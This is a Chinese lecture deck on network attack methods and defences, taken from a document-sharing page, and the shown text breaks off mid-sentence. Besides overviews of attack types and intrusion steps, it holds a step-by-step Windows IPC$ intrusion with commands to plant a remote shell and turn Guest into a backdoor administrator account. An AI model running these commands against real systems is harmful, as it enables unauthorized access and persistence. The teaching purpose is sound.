网络攻击的常见手段与防范措施讲义.ppt

  1. 1、本文档共43页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
1980 1985 1990 1995 2000 密码猜测 可自动复制的代码 密码破解 利用已知的漏洞 破坏审计系统 后门 会话劫持 擦除痕迹 嗅探 包欺骗 GUI远程控制 自动探测扫描 拒绝服务 www 攻击 工具 攻击者 入侵者水平 攻击手法 半开放隐蔽扫描 控制台入侵 检测网络管理 DDOS 攻击 2002 高 入侵技术的发展 01 入侵技术的历史和发展 02 一般攻击步骤 03 攻击实例与攻击方式 目 录 常见的攻击方法 端口扫描:网络攻击的前奏 网络监听:局域网、HUB、ARP欺骗、网关设备 邮件攻击:邮件炸弹、邮件欺骗 网页欺骗:伪造网址、DNS重定向 密码破解:字典破解、暴力破解、md5解密 漏洞攻击:溢出攻击、系统漏洞利用 种植木马:隐蔽、免杀、网站挂马、邮件挂马 DoS、DDoS:拒绝服务攻击、分布式拒绝服务攻击 cc攻击:借助大量代理或肉鸡访问最耗资源的网页 XSS跨站攻击、SQL注入:利用变量检查不严格构造javascript语句挂马或获取用户信息,或构造sql语句猜测表、字段以及管理员账号密码 社会工程学:QQ数据库被盗 端口 判断 判断 系统 选择 最简 方式 入侵 分析 可能 有漏 洞的 服务 获取 系统 一定 权限 提 升 为 最 高 权 限 安装 多个 系统 后门 清除 入侵 脚印 攻击其 他系统 获取敏 感信息 作为其 他用途 常见的系统入侵步骤 IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。 攻击步骤 1.收集主机信息  Ping命令判断计算机是否开着,或者数据包发送到返回需要多少时间  Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径  Finger和Rusers命令收集用户信息  Host或者Nslookup命令,结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法: 获取网络服务的端口作为入侵通道。 2.端口扫描 1.TCP Connect() 2.TCP SYN 3.TCP FIN 4.IP段扫瞄 5.TCP反向Ident扫瞄 6.FTP代理扫瞄 7.UDP ICMP不到达扫瞄 7种扫瞄类型: 3、系统漏洞利用 一次利用ipc$的入侵过程 1. C:\net use \\x.x.x.x\IPC$ “” /user:“admintitrator” 用“流光”扫的用户名是administrator,密码为“空”的IP地址  2. C:\copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:\net time \\x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功完成。 4. C:\at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:\net time \\x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05,那就准备开始下面的命令。 6. C:\telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\copy ntlm.exe \\\admin$ ntlm.exe也在《流光》的Tools目录中   8. C:\WINNT\system32ntlm 输入ntlm启动(这里的C:\WINNT\system32是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 10. C:\net user guest /active:yes 为了方便日后登陆,将guest激活并加到管理组 11. C:\net user guest 1234 将Guest的密码改为1234 12. C:\net localgroup administrators guest /add 将Guest变为Administrator 01 入侵技术的历史和发展 02 一般攻击步骤 03 攻击实例与攻击方式 目 录 北京时间10月22日凌晨,美国域名服务器管理服务供应商Dyn宣布,该公司在当地时间周五早上遭遇了DDoS(分布式拒绝服务)攻击,从而导

文档评论(0)

jiayou10 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8133070117000003

1亿VIP精品文档

相关文档